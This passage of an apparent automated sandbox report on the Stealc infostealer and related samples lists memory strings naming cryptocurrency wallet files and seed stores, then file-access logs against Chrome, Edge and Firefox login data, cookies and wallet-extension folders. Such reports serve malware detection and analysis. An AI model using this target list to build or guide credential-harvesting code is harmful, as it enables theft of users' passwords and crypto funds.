Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.>

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
